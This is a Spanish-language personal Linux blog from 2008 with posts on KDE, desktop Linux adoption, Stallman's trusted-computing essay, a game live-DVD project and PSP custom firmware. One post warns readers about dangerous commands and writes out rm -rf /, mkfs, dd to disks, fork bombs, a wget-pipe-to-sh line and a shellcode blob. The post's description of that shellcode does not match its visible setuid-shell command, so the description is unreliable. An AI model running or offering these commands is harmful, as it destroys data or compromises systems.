jueves, 13 de noviembre de 2008

De vuelta en KDE 3.5

Así es, bueno, esto no lo he contado antes por que en realidad tengo el blog abandonado y me da weba actualizar, pero vale xD

Hace tiempo, ArchLinux decidio mover KDE a la version 4, y desafortunadamente esto rompio mi sistema (ya que KDE4 no andaba y regresar a paquetes sin mantener de KDE 3.5 era torpe), de modo que tuve que reinstalar.
Tras esto, el sistema ya permitio instalar rapidamente el nuevo KDe 4.1 y, pues la verdad no me gusto.

Es inestable, pesado (a nivel de uso al menos, en memoria teoricamente se redujo el uso), y ademas sufre de dos detalles importantes: esta incompleto. Muchas aplicaciones no tienen la misma funcionalidad que en el anterior KDE, pero si tienen nuevas funcionalidades que reemplazan a las anteriores e incluso novedades, sin embargo es navaja de doble filo por que estas o bien no estan completamente implementadas o estan rotas.

Es por ello que decidi recurrir al proyecto KDEmod, el cual mantiene un sistema KDE modular y con interesantes parches que usan otras grandes distros como kubuntu (claro, siempre que no rompan nada) y hacer de KDE 3 una mejor experiencia. Uno de los beneficios de KDEMod es que ellos estan manteniendo ambas ramas de KDE, mientras que ArchLinux solo soporta la ultima KDE 4.1 por ahora.

He aqui unos screen de mi desktop ^-^

viernes, 17 de octubre de 2008

Razones por las cuales la gente no se pasa a GNU/Linux

En una larga entrevista concedida a la Linux Foundation, Linus Torvalds ha hablado del pasado, presente y futuro de Linux, y ha comentado las razones por las cuales según su opinión Linux sigue sin triunfar en el escritorio: la gente está contenta con cómo están las cosas.

En la entrevista Torvalds confirmó que su verdadero interés era el de hacer que Linux triunfase en la informática personal, la informática de escritorio que usa la amplia mayoría de la gente. Sin embargo, las cosas no están saliendo como él podría desear, y eso se debe a una realidad eterna y palpable: mejor lo malo conocido que lo bueno por conocer, afirma en su entrevista con Linux Foundation.

“Si haces cosas de forma distinta a Windows, incluso en el caso de que las hagas mejor, no importa. Lo mejor es peor si es diferente”

El razonamiento de Linus es aplastante: no importa que Linux pueda ser mejor o peor: la inercia de los usuarios de Windows, que se encuentran a gusto con un sistema que les es muy familiar les impide considerar otras opciones, aunque estas sean mejores.

“El escritorio es también el apartado en el que la gente se pone nerviosa si algo cambia, de modo que es realmente difícil entrar en este mercado por que la gente está acostumbrada a lo que sea que utilizaran antes, y en la mayoría de los casos eso es Windows”.

De hecho, este razonamiento también se puede aplicar al reducido éxito de Windows Vista, un sistema operativo que tiene sus defectos pero que cuyo mayor problema es precisamente que algunos de los cambios han echado para atrás a los usuarios, que ya se habían acostumbrado a la forma de trabajar con Windows XP.

Fuente: http://www.theinquirer.es/2008/02/08/linus_explica_porque_la_gente_no_se_pasa_a_linux.html


Estos son comentarios sueltos sacados de esa discusión:

"Los equipos van quedando obsoletos por muchos motivos, no solo es cuestión de recursos. Manejamos mas información que antes pero eso si, ¿manteniendo los tiempos de respuesta? entonces comienzan los problemas. Esto es igual en cualquier sistema operativo, si tu quieres manejar archivos mas grandes, necesitarás mas memoria, evidentemente y mas rapidez a la hora de leer o escribir datos en un disco duro, por tanto… influye la cantidad de memoria, la velocidad de la controladora, la velocidad del disco duro y la velocidad del procesador para mantener al maximo el nivel de todos los anteriores. Usamos codecs que nos permiten ver peliculas comprimidas para ser reproducidas desde un CD. Estos evolucionan, son mas complejos y nos piden un microprocesador mas elevado. Al ser un proceso crítico, no podemos pedir que nos vaya suministrando la información segun termine, si este no lo hace a tiempo, la pelicula no la ve ni dios a no ser que tengas los nerivos de acero.

Que es cierto que no necesitamos tener un maquinon para ejecutar un programa a medida que no ha cambiado en los ultimos años, que ni siquiera evoluciona con los sistemas operativos, que permanece intacto con el paso de los años.

El problema en ese caso comienza cuando ese ordenador que ejecuta esa aplicacion deja de funcionar, entonces te compras uno nuevo, lo mas normalito que encuentres en el mercado pero… vaya, otro problemas mas. Windows 95 no funciona con los equipos nuevos, da un pequeño problema, el famoso pantallazo azul y termina por reiniciarse. Los USB tienen algo que ver. Si no han pasado los años suficientes, tendras suerte con Windows 98, sino, tendrás otro problema similar. El motivo es que han eliminado la compatibilidad de las bios para esos sistemas operativos, dejando paso a los nuevos que están en el mercado. Terminas por instalarte Windows XP, pero el programa no es compatible porque el programador de turno, independiente, no ha evolucionado su software, ya que lo ha programado una vez en su vida y tan solo lo ha tocado para solucionar fallos.

Terminas usando una maquina virtual para tener windows 95 instalado, por ejemplo. Funciona sin problemas exceptuando que… los ordenadores de hoy no tienen los mismos puertos que los de antes, dos com, uno de impresora. Pruebas con un “dongel” y no te funciona, el puerto aparentemente está ahí pero… el programa no va, otra vez en el punto inicial.

¿Que ocurre? que siempre tienes que actualizarte, te guste o no. Sea porque Microsoft esté detrás de todo esto o porque los fabricantes, que tambien son empresas y viven de lo que venden, esten tan interesados como Microsoft en que el mercado no se detenga e imagino que de esto es de lo que trata el mundo entero aunque el software libre se empeñe en demostrar que esto no deba ser así.

El mundo que hoy conocemos, que está basado en el capitalismo, lo unico que necesita para funcionar es dinero, el resto… les da exactamente igual.

Es mi opinión y repito, mis argumentos no estan basados en ninguna intencion alguna de hacer ver que un sistema operativo es peor que otro, simplemente exponen lo que dicen, sin ningun doble sentido."


* por Inconight

"La defensa de los usuarios de Windows se basa en la premisa falaz de “todo lo que hago en Windows que no puedo hacer en Linux”.

Esto es porque “Linux no es Windows” (y nunca lo será).

Es como si digo que Windows es una castaña, porque no puedo crear dos archivos con el mismo nombre, uno en mayúsculas y otro en minúsculas.

Este es el típico rechazo de los usuarios reticentes a todo cambio. Es que con Outlook hacía tal y cual, pues bien, Thunderbird o Evolution no son Outlook y tienen cosas mejores y otras peores, por ejemplo los gestores de correo de Linux no se diseñaron para instalar virus con la misma facilidad que reciben el correo. El virus “I Love You” es una muestra de lo que digo.

Yo he puesto Ubuntu en mi portátil y no he tenido que poner ni un solo driver propietario y me ha detectado la impresora, el escaner y ha puesto la resolución y el refresco de pantalla correctamente. Tardé 15 minutos en tenerlo todo operativo.

Todavía recuerdo las horas y horas que me he tirado configurando drivers de pantalla en Windows como para que no me entre la risa leyendo lo que se dice aquí.

He instalado Vmware player en mi Ubuntu sin problemas de ninguna clase, la primera vez desde Automatix y la segunda descargando un .deb de vmware.com, pero ahora uso Virtualbox por el mismo precio.

En los años que he usado Windows (desde la versión que no era capaz de superponer ventanas), he tenido todo tipo de problemas, muchos de ellos con drivers, con todo tipo de programas, con incompatibilidad del hardware, con programas que instalas y dejan inservible todo, con fallos del sistema operativo y con espectros que sin explicación alguna dejaban el sistema operativo destrozado (y a reinstalarlo todo otra vez)…

Cuantas veces habré oido lo de “Formatea y vuelve a instalarlo todo”.

Me parece de chiste sacar a relucir lo difícil que es hacer algunas cosas con Linux, cuando Windows es el sistema operativo:

- Que no aguanta encendido maś de dos días sin quedarse colgado.

- Que se queda tostado en cuanto falla una aplicación.

- En el que tienes que perder más tiempo en instalar antivirus y tapar agujeros que en trabajar.

- Que tienes que reinstalar cada pocos meses (con suerte).

- Que cada vez funciona más lento, hasta que terminas por reinstalarlo de nuevo para empezar el mismo círculo vicioso de nuevo.

y encima, cada cosa que instalas es pirata o te cuesta una pasta.

Si un usuario de Windows tuviera que pagar forzosamente los 500€ del Office, los 700€ del Photoshop, etc., simplemente se pasaría a Linux al día siguiente, pero para los fabricantes como Adobe. M$ y Autodesk es mucho mejor que la gente use copias piratas, así se acostumbran a sus programas y ellos pueden decir que tienen pérdidas astronómicas por la piratería, gran falacia que presupone que un usuario de una copia pirata habría pagado su precio de mercado.

Al final, lo cierto es que el usuario medio de Windows se pasa el día descargando del P2P e instalando cracks, con el problema de seguridad que eso conlleva.

Yo uso Ubuntu y he encontrado soluciones a todo lo que hacía, en un año que llevo usando Ubuntu en mi escritorio sólo hecho de menos un gestor de imágenes que se llama Compupic, del que tengo la licencia para Windows comprada desde principios de los 90, pero aun así, me arreglo con aplicaciones gratuitas.

Es muy fácil decir que Openoffice no puede superar a M$ office 2007, pero no es cierto, Openoffice gana por goleada en consumo de recursos, velocidad y estabilidad y vale para el 99% de los usuarios exactamente igual y su precio es (en términos matemáticos exactos), infinitamente más barato.

Me gustaría saber cuantos usuarios de M$ Office lo usarían si se vieran forzados a pagar la licencia (por ejemplo si M$ usara un sistema de protección imposible de saltar).

Creo que este tipo de debates acaban siempre convertidos en un flame.

Pues si, pero normal, porque hay quien se pone a escribir de forma subjetiva y falaz sobre el asunto.

Trabajo de director técnico de una empresa TI desde 1989 y he tenido que dar soporte de cosas como Novell, Xenix y Windows.

Durante años he instalado soluciones basadas en Windows para todo tipo de empresas (algunas muy grandes) y he conseguido que hicieran su trabajo, pero a base de muchas horas de técnicos trabajando.

Nuestra solución definitiva para los usuarios de Windows es un sistema que hemos desarrollado consistente en guardar los datos de los usuarios en un servidor Linux y un sistema en el MBR que con un menú restaura una copia limpia de Windows en unos minutos.

A los que se atreven, ahora les estamos instalando soluciones basadas en Linux, con los servidores es fácil, con el dinero de las licencias de Windows se paga el hardware y usar Linux es transparente para el usuario.

En los escritorios el principal problema es la resistencia de los usuarios a cambiar a algo que no conocen, que normalmente termina en enfrentamientos con la directiva de algunos elementos ostiles y empecinados que siempre hay en toda empresa.

He tenido algún caso en el que me han dado ganas de estrangular a alguien por una defensa irracional y falaz a más no poder de que no podían usar Linux+openoffice para enviar email y editar cuatro archivos.

En el ámbito doméstico la gente que haga lo que quiera, pero en las empresas acabará ganando lo más práctico y barato antes o después.

Creo que el único Windows que veremos en el futuro sera un “Windows GNU/Linux”. No me extrañaría que los de Redmon ya estuvieran trabajando en algo así."

* por juanex

"Todos incluso los que usamos linux sabemos que los desarrolladores estan trabajando duramente (incluso sin paga) para arreglar los problemas de linux, que si son bastantes, pero cada vez menos.

debes recordar que el objetivo de linux no es monopolizar, si no ser una alternativa. Cuando el mercado pase a 30% windows, 30% mac , 30% linux, y el 10% restante otros (libres o comerciales), ya habremos logrado nuestro objetivo.

destruir a m$ no es un objetivo, sino que la gente no siga monopolizada por ellos."


* por manny

En resumen:
"Lo mejor es peor si es diferente”

¿Es esta ideologia la que queremos?
Habrá que tomar en cuenta que de aquí siempre ha partido todo lo que es humanamente malo: los nazis, la esclavitud a negros, el maltrato a irlandeses, la homofobia; practicamente TODO LO MORALMENTE INACEPTABLE viene de aquí. Y M$ no se queda atrás...

sábado, 19 de abril de 2008

Comandos peligrosos

Hay mucha gente que nos quiere joder el sistema, y por varios metodos nos quieren colar scripts o hacernos meter comandos riesgozos en una terminal. El objetivo de este texto (obtenido de la comunidad de Ubuntu en inglés) es hacernos mas concientes de los peligrosos comandos en la red y como evitarlos.

- Estos comandos pueden borrar todo lo que encuentren o tengan permisos para escribir.

Código:
rm -rf /
rm -rf .
rm -rf *

Este comando borrará todos los archivos ocultos en el directorio actual:

Código:
rm -r .*


El Siguiente comando borrará todo lo que que está en una carpeta y sus contenidos:

Código:
rm -r .[^.]*


- Estos comandos se meten con tus sistemas de ficheros dañando los datos que tengas:

Código:
mkfs
mkfs.ext3
mkfs.anything


- Manipulacion de bloques en los dispositivos: provoca que datos RAW sean escritos en un bloque del dispositivo, a veces provoca la pérdida de todos tus datos por abuso del sistema de ficheros:

Código:
any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Es un comando que repite procesos de forma infinita hasta congelar el sistema y obligarte a hacer un hard reset, provocando posibles pérdidas de datos:

Código:
:(){:|:&};:


Una forkbomb en Perl:

Código:
fork while fork


Tarbomb: Son archivos tar que al descomprimirse en una carpeta ya existente sobreescriben ficheros y hacen muchos nuevos de forma enfermiza, para evitar esto siempre hay que extraer los ficheros comprimidos en un nuevo directorio limpio.

Decompression bomb: Similar al Tarbomb, estos archivos aparentan ser muy pequeños pero al descomprimirlos llenan tu disco con

Shellscript: A veces alguien te da un enlace para que ejecutes un shellscript. Esto puede contener cualquier comando que comience con -- . No confies y no ejecutes codigos que no estes seguro de su confiabilidad.

Código:
wget http://some_place/some_file
sh ./some_file


Código:
wget http://some_place/some_file -O- | sh


Compilando desde las fuentes: Un problema muy común, donde alguien simplemente te da el código fuente de alguna aplicación y te dice que lo compiles. Al hacer esto comprometes tu equipo puesto que es muy facil ocultar código malicioso en las grandes cantidades de código que por lo general una aplicación o librería tiene. Es por ello que lo mejor es siempre obtener y compilar nuestro software desde fuentes confibles (como la web del autor o SourceForge).

Shellcodes: Una shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador que se inyectan en la pila para conseguir que la máquina en la que reside se ejecute la operación que se haya programado. Se utilizan para ejecutar código aprovechando ciertas vulnerabilidades exploit en el código llamadas desbordamiento de búfer. Principalmente el shellcode se programa para permitir ejecutar un intérprete de comandos en el equipo afectado.

Código:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Esto ultimo en realidad ejecuta 'rm -rf ~ / &', lo cual destruirá todos tus ficheros como usuario regular y todo tu sistema de archivos si eres root. Es por ello que JAMÁS debes confiar en los shellcodes, que aunque para un novato puedan parecer una geekeada hexadecimal es en realidad un peligroso comando.

_________________________________________________________________

En resumen, la seguridad en cualquier sistema UNIX, depende mucho de la cautela de su administrador, evitando usar estos comandos y siguiendo las sugerencias nos acercamos a un sistema mas sano.

Administración sana de nuestro UNIX

Saludos.

Se que tengo tiempo sin publicar algo, y se que esto ya tiene tiempo sucediendo, y es que me da flojera estar actualizando el puto blog.

En fin, para no marearlos con el clasico bloggero "no tengo oportunidad/tiempo/ganas/ideas para actualizar" mejor vamos al tema directamente.

Esta vez voy a abrir una nueva serie llamada "Administración Sana para Sistemas UNIX", en la cual basicamente hablaré sobre como hacer nuestro sistema mas solido y seguro.

Espero retroalimentación de ser posible xD...

viernes, 11 de abril de 2008

Computacion Confiable [TC] o ¿Computacion Traicionera?

¿De quién debería recibir órdenes su computadora? Mucha gente piensa que sus computadoras deberían obedecerles a ellos, en vez de a otras personas. Mediante un plan al que llaman "computación confiable" ("trusted computing", en inglés), grandes corporaciones de los medios de comunicación (incluyendo las compañías cinematográficas y de la industria discográfica) junto con compañías de computadoras tales como Microsoft e Intel, están planificando hacer que su computadora los obedezca a ellos en vez de a usted. (La versión de Microsoft de este esquema se llama "Palladium"). Los programas privativos han incluido características maliciosas en el pasado, pero este plan haría esto universal.
Software privativo significa, fundamentalmente, que usted no controla lo que hace; no puede estudiar el código fuente o modificarlo. No es sorprendente que hábiles hombres de negocios encuentren formas de usar su control para ponerle a usted en desventaja. Microsoft ha hecho esto varias veces; una versión de Windows fue diseñada para reportar a Microsoft todo el software en su disco duro; una reciente actualización de "seguridad" en el Reproductor Multimedia de Windows requería que los usuarios aceptaran nuevas restricciones. Pero Microsoft no está solo: el software para intercambio de música KaZaa está diseñado de forma que un asociado de negocios de KaZaa pueda alquilar el uso de su computadora a sus clientes. Estas características maliciosas son normalmente secretas, pero una vez que usted se entera de ellas es difícil eliminarlas, dado que no dispone del código fuente.
En el pasado, estos fueron incidentes aislados. "Computación confiable" los haría omnipresentes. "Computación traidora" es un nombre más apropiado, porque el plan está diseñado para asegurarse de que su computadora sistemáticamente lo desobedecerá. De hecho, está diseñado para que la misma deje de funcionar como una computadora de propósito general. Cada operación puede requerir de una autorización explícita.
La idea técnica detrás de la computación traidora es que la computadora incluye un dispositivo de cifrado y firma digital, y las claves se mantienen secretas para usted. Los programas privativos usan este dispositivo para controlar qué otros programas puede ejecutar, a qué documentos o datos puede acceder y a qué programas se los puede transferir. Esos programas continuamente descargarán nuevas reglas de autorización a través de Internet, e impondrán dichas reglas automáticamente a su trabajo. Si usted no permite a su computadora obtener las nuevas reglas periódicamente de Internet, algunas capacidades dejarán automáticamente de funcionar.
Por supuesto, Hollywood y las compañías discográficas planean usar la computación traidora para "DRM" ("Administración de Restricciones Digitales" o "Digital Restriction Management", en inglés), así los vídeos y la música descargados podrán ser reproducidos sólo en una computadora específica. Compartir será completamente imposible, al menos usando los archivos autorizados que deberá obtener de dichas compañías. Usted, el público, debería tener la libertad y la habilidad de compartir esas cosas. (Espero que alguien encuentre la forma de producir versiones no cifradas, y de subirlas y compartirlas, así DRM no tendrá éxito completamente, pero esto no es excusa para el sistema).
Hacer imposible el compartir ya es lo suficientemente malo, pero se pone peor. Existen planes para usar la misma facilidad al enviar documentos por correo electrónico -- resultando en mensajes que desaparecen en dos semanas, o documentos que sólo pueden ser leídos en las computadoras de determinada compañía.
Imagínese si usted recibiera un mensaje de correo electrónico de su jefe diciéndole que haga algo que usted piensa que es arriesgado; un mes después, cuando el tiro sale por la culata no puede usar el mensaje para mostrar que la decisión no fue suya. "Ponerlo por escrito" no lo protege si la orden está escrita en tinta que desaparece.
Imagínese si usted recibe un mensaje de correo electrónico de su jefe estableciendo una política que es ilegal o inmoral, tal como destrozar los documentos de auditoría de su compañía, o permitir que una amenaza peligrosa para su país avance sin ser controlada. Actualmente, usted puede enviar esto a un periodista y exponer la actividad. Con la computación traidora, el periodista no será capaz de leer el documento; su computadora se negará a obedecerlo. La computación traidora se transforma en un paraíso para la corrupción.
Los procesadores de texto tales como Microsoft Word podrían usar la computación traidora cuando usted guarde sus documentos, para asegurarse de que ningún procesador de texto de la competencia podrá leerlos. Actualmente debemos averiguar los secretos del formato de Word mediante laboriosos experimentos, para que los procesadores libres puedan leer documentos de Word. Si Word cifra los documentos usando computación traidora cuando los guarda, la comunidad del software libre no tendrá la posibilidad de desarrollar software para leerlos -- y si pudiéramos, tales programas podrían ser prohibidos por la Digital Millennium Copyright Act (Ley de Copyright del Milenio Digital).
Los programas que usen computación traidora continuamente descargarán nuevas reglas de autorización desde Internet, e impondrán dichas reglas a su trabajo. Si a Microsoft, o al gobierno de los EEUU no les agrada lo que usted dice en un documento que escribió, podrán publicar nuevas restricciones diciendo a todas las computadoras que se rehusen a dejar que alguien lea dicho documento. Cada computadora del mundo obedecerá cuando descargue las nuevas instrucciones. Su escrito estará sujeto a un borrado retroactivo estilo 1984. Hasta usted podría ser incapaz de leerlo.
Podría pensar que usted puede averiguar que cosas sucias hace una aplicación de computación traidora, estudiar qué tan dañinas son, y decidir si aceptarlas. Sería ingenuo aceptarlo, pero el punto es que el trato que cree que está haciendo no se mantendrá. Una vez que usted dependa del uso del programa, estará enganchado y ellos lo saben; entonces pueden cambiar el trato. Algunas aplicaciones automáticamente bajarán actualizaciones que harán algo diferente -- y no le darán la posibilidad de elegir si desea la actualización o no.
Actualmente puede evitar ser restringido por software privativo no usándolo. Si ejecuta GNU/Linux u otro sistema operativo libre, y si evita instalar aplicaciones propietarias sobre él, entonces usted está al mando de lo que su computadora hace. Si un programa libre tiene una característica maliciosa, otros desarrolladores en la comunidad la quitarán y usted puede usar la versión corregida. Puede también ejecutar aplicaciones y herramientas libres en sistemas operativos no libres; esto falla completamente en darle libertad, pero muchos usuarios lo hacen.
La computación traidora pone en peligro la existencia de sistemas operativos y aplicaciones libres, porque usted ya no podrá ejecutarlas. Algunas versiones de la computación traidora requerirán que el sistema operativo esté específicamente autorizado por una compañía particular. Los sistemas operativos libres no podrán ser instalados. Algunas versiones de la computación traidora requerirán que cada programa sea específicamente autorizado por el desarrollador del sistema operativo. No podrá ejecutar aplicaciones libres en tales sistemas. Si usted averigua cómo hacerlo y se lo dice a alguien, eso podría constituir un delito.
Existen proyectos de ley en EEUU que requieren que todas las computadoras soporten computación traidora, y que se prohiba la conexión de computadoras antiguas a Internet. La CBDTPA (la llamamos Ley Consuma Pero No Trate de Programar, Consume But Don't Try Programming Act, en inglés) es uno de ellos. Pero inclusive si no lo fuerzan legalmente a migrar hacia la computación traidora, la presión para aceptarla puede ser enorme. Actualmente las personas usualmente utilizan el formato Word para comunicarse, aunque esto causa varios tipos de problemas (vea "Podemos Acabar con los Archivos Adjuntos en Word"). Si solamente una máquina de computación traidora puede leer los últimos documentos de Word, mucha gente migrará hacia ella, si ven la situación sólo en términos de acción individual (tómalo o déjalo). Para oponernos a la computación traidora, debemos unirnos y confrontar la situación como una elección colectiva.
Para mayor información sobre computación traidora, vea .
Bloquear la computación traidora requerirá que se organicen un gran número de ciudadanos. ¡Necesitamos su ayuda!. La Electronic Frontier Foundation (Fundación Frontera Electrónica) y Public Knowledge (Conocimiento Público) están organizando campañas en contra de la computación traidora, así como también el Digital Speech Project (Proyecto Expresión Digital) esponsorizado por la FSF. Por favor, visite estos sitios Web para poder sumarse y apoyar de su trabajo.
También puede ayudar escribiendo a las oficinas de asuntos públicos de Intel, IBM, HP/Compaq, o cualquiera a quien usted le haya comprado una computadora, explicándole que no quiere ser presionado a comprar sistemas de computación "confiable", por lo cual no está de acuerdo en que ellos los produzcan. Esto puede ejercer la presión del poder del consumidor. Si usted hace esto, por favor envíe copias de sus cartas a las organizaciones antes citadas.
Posdatas
El proyecto GNU distribuye GNU Privacy Guard, un programa que implementa cifrado de clave pública y firmas digitales, el cual puede utilizase para enviar mensajes de correo electrónico seguros y privados. Es muy ilustrativo examinar cómo GPG se diferencia de la computación traidora, y ver qué hace a una tan útil y a la otra tan peligrosa.
Cuando alguien usa GPG para enviarle un documento cifrado y usted usa GPG para decodificarlo, el resultado es un documento no cifrado que usted puede leer, reenviar, copiar e inclusive re-cifrar para enviarlo de forma segura a un tercero. Una aplicación de computación traidora lo dejaría leer las palabras en la pantalla, pero no producir un documento no cifrado que pudiera usar de otras formas. GPG, un paquete de software libre, pone las funciones de seguridad a disposición de los usuarios: ellos lo usan. La computación traidora está diseñada para imponer restricciones a los usuarios: ella los usa.
Microsoft presenta a palladium como una medida de seguridad, y proclama que brindará protección contra virus, pero esta afirmación es evidentemente falsa. Una presentación de Microsoft Research en octubre de 2002 estableció que una de las especificaciones de palladium es que los sistemas operativos y aplicaciones existentes seguirán pudiéndose ejecutar, por lo tanto, los virus seguirán siendo capaces de hacer todas las cosas que hacen actualmente.
Cuando Microsoft habla de "seguridad" con relación a palladium, no lo hace con el significado que normalmente asociamos a esa palabra: proteger a su computadora de cosas que usted no desea. Ellos se refieren a proteger su acceso a las copias de datos en su computadora de formas que otros no desean que se realice. Una diapositiva en la presentación enumeraba varios tipos de secretos que palladium podría resguardar, incluyendo "secretos de terceras partes" y "secretos de usuario" -- pero poniendo "secretos de usuario" entre comillas, reconociendo que es un absurdo en el contexto de palladium.
La presentación hizo uso frecuente de otros términos que usualmente asociamos en el contexto de seguridad, tales como "ataque", "código malicioso", "engaño" ("spoofing", en inglés), así como también "confianza". Ninguno de esos términos tiene el significado usual. "Ataque" no significa alguien tratando de dañarlo a usted, sino usted intentando copiar música. "Código malicioso" significa código instalado por usted para hacer algo que otros no desean que su computadora haga. "Engaño" no significa alguien engañándolo, sino usted engañando a palladium. Y así sucesivamente.
Una declaración previa de los desarrolladores de palladium establecía la premisa básica que quien hubiera desarrollado o recolectado información debía tener control total sobre cómo usted la usa. Esto hubiera representado una vuelta revolucionaria de ideas pasadas acerca de éticas y del sistema legal, y creado un sistema de control sin precedentes. Los problemas específicos de esos sistemas no son accidentales; sino que resultan de metas básicas. Es la meta que debemos rechazar.
Copyright © 2002 Richard Stallman.
Está permitida la distribución y copia literal de este artículo completo en cualquier medio, siempre que se preserve esta nota.

domingo, 30 de marzo de 2008

NWN/Live Beta I lista

Saludos a los pocos amigos que leen el blog ya sea desde Blogger o desde les feeds.

Bue, tal como dice el titulo, la Beta I ya esta lista, y tan solo falta subirla a internet xD, lo cual sera un feo problema pero ya me lidiare con el.


Caracteristicas

> Basada en Arch Linux, usando un kernel stock 2.6.24
> Incluye la ultima version estable de NWN incluyendo las expansiones oficiales y la comunitaria CEPv2
> Tiene instalado el hack para que use mouse por hardware y no por software
> Soporte para un monton de tarjetas de video, incluyendo el controlador libre RadeonHD y un sistema avanzado de autoconfiguracion automatico
> Kooldock y OpenBox3 para una agradable experiencia de uso
> Thunar y Firefox como utilidades adicionales
> Un nuevo instalador grafico - Archin - que copia el contenido del Live-DVD al disco duro y quita lo que solo sirve para Live-DVD, parte del proyecto Larch

De momento no esta terminado, es obviamente la primera beta y publica, es por ello que espero nos ayuden con el testeo una vez que la hayan descargado, si les interesa colaborar con el desarrollo o testing solo dejen un mensaje aqui o manden un correo a *lord.ltsmash gmail com*

viernes, 21 de marzo de 2008

Hoy fume peyote

Esto es lo que pasa cuando fumas peyote, obtienes una "oda al ser critico"

Agua, viento, tierra y fuego...
Todo es energía
Gaia, elementos fisicos, elementos virtuales
nadie sabe lo que pasa,
pero todos creen saber.

Mundo coordinado, mundo controlado
La vida viene y va
dicen los ancianos
Jamás he muerto, jamás moriré
Mi meta: critico ser

Oye mi oda, escuchala
¿Comprendes que no tiene vida?
Mirate, observate
¿Entiendes que muerto estás aunque el tiempo siga?

Muchos dicen saber,
hablan, explican y no callan;
yo digo que la gracia está en el ser
La vida sigue pero muerto te hallas
¿Que es la vida si no la puedes entender?

Llaman tonto al sabio,
necio al observador,
rebelde al liberal,
¿Como te llamas a tí?
Al fin que vivo no estás.

Que muera la espontaneidad,
Que muera el saber,
A ti no te interesa conocer,
al fin que solo quieres placer.
Una gota mas en el mar.

¿Como podemos afirmar algo sin conocerlo?
¿Como defendemos algo sin entenderlo?
¿Como aceptamos una verdad por obvia sin argumentos?
Eso es la vida del cualquiera,
y la muerte del ser, entiendelo...


olvide que les doy permiso de usar esta obra (xD) bajo la licencia Creative Commons-Share Alike :p

domingo, 16 de marzo de 2008

Las mejores 50 canciones segun yo

Pues sí, el ocio mueve xD. Aqui las mejores canciones según yo, en realidad el orden no importa:

Black Diamond - Stratovarius
Soul Of a vagabond - Stratovarius
Phantom of the Opera - Iron Maiden
The Trooper - Iron Maiden
Wishmaster - Nightwish
Rebirth - Angra
I Want out - Helloween
the King For 1000 Years - Helloween
Hocus Pocus - Helloween
One - Metallica
Master Of Puppets - Metallica
Phantom of the Opera - Nightwish
Downfall - Children of Bodom
Cold - Crossfade
Fury of the Storm - Dragonforce
You know my name - Chris Cornell
Like a Stone - Audioslave
With Arms Wide Open - Creed
My Sacrifice - Creed
Blood Bound - Hammerfall
Power - Helloween
Mrs. God - Helloween
As Long As I Fall - Helloween
Eagleheart - Stratovarius
Speed Of light - Stratovarius
Sleep Well - Kotipelto
Lithium - Nirvana
Come As You Are - Nirvana
Seven Days to the Wolves - Nightwish
Phantom of the Opera - Nightwish
Wish I had an Angel - Nightwish
The Poet and the Pendulum - Nightwish
Engel - Rammstein
Seemann - Rammstein
Rock you like a Hurricane - Scorpions
You Only Live Once - the Strokes
Fortune Faded - RHCP
Californication - RHCP
Carry On - Angra
Acid Rain - Angra
Speed of Sound - Coldplay
La Planta - Caos
Cold Winter Nights - Stratovarius
Somewhere Only We Know - Keane
Chop Suey - System of a Down
Elevation - U2
Drowning - Crazy Town
Jaded - Aerosmith
Bring me to Life - Evanescence
Supermassive Black Hole - Muse

Opinen xD

domingo, 24 de febrero de 2008

NWN-Live, un DVD no tan común

Saludos a los pocos amigos lectores (xD), ya se que tenia rato sin publicar pero bueno ya he vuelto.

Hoy quiero hablarles del proyecto que me entretuvo unas cuantas semanas, se trata de un Live-DVD basado en Arch Linux e inspirado en la live.linuX-gamers.net, pero con unas miras mas tensas a cumplir una meta:

Crear un DVD Vivo para jugar al maravilloso Neverwinter Nights con sus expansiones bajo GNU/Linux

Este Live-DVD ya esta empaquetado como un pre-Alpha cerrado, sin embargo publicaré la primera Alpha la siguiente semana si me es posible subirla (pesa 3.0GB).


Como características tiene:


- Un sistema básico de autodetección de hardware de vídeo y configuración ya sea automática/manual de X.org.
- El ultimo software disponible bajo Arch Linux.
- X.org + Un montón de modulos de video (incluido Nvidia en futuras versiones) + Openbox.
- Navegador web (Firefox) por si acaso.
- Red preconfigurada para DHCP, con posible configuración manual.
- Los controladores Wi-Fi mas comunes
- Neverwinter Nights nativo incluyendo las expansiones SoU y HotU + CEPv2
- Servidor dedicado para NWN

Concretaré más información la siguiente semana, informes en lord.ltsmash // gmail // com

martes, 22 de enero de 2008

Cambiando el firmware de nuestra PSP por uno Custom

Como ustedes quiza saben, Sony NO PERMITE el uso de aplicaciones "homebrew" (es decir, caseras) en nuestros PSP's... entonces, para poder hacer esto ( es decir, poder cargar firmwares e incluso juegos de PSP sin tener el UMD) hay que ponerle un Custom Firmware, lo que nos permite explotar nuestro PSP y hacer muchas cosas geniales con el, pero de esto hablare mas adelante.

Montando nuestra PSP en Linux


En el raro caso de que al conectar nuestro PSP y ponerlo en modo USB no se monte automáticamente, o que de algún error raro, lo que haremos es agregarlo a nuestro FSTAB para poderlo montar con facilidad. Ademas, hay que configurarlo de todas formas ya que usa nombres de archivo del tipo WIndows 95 y si le ponemos de otro podría malfuncionar.


Suponiendo que nuestra PSP está en /dev/sdc1, añadiremos la siguiente línea al FSTAB:

/dev/sdc1 /mnt/psp vfat shortname=win95,check=s,rw,user,noauto 0 0

De está forma solo tendremos que usar el comando "mount /mnt/psp" cada vez que queramos acceder a la Memory Stick, no olviden crear el directorio /mnt/psp , por favor -.-





Tengo el placer de anunciarles, que NO, No y NO vamos a usar Mierdows de ninguna manera xD...
Esta aplicación se llama "UltraPandora Installer", y tiene las siguientes funciones:

Funciones

  • Permite Formatear Memory Stick
  • Extraccion de Archivos Update 1.50 y MsIpl.Bin
  • Instalacion de MsIpl en la Memory Stick (Opcional para usuarios con Ms_Multi_Loader)
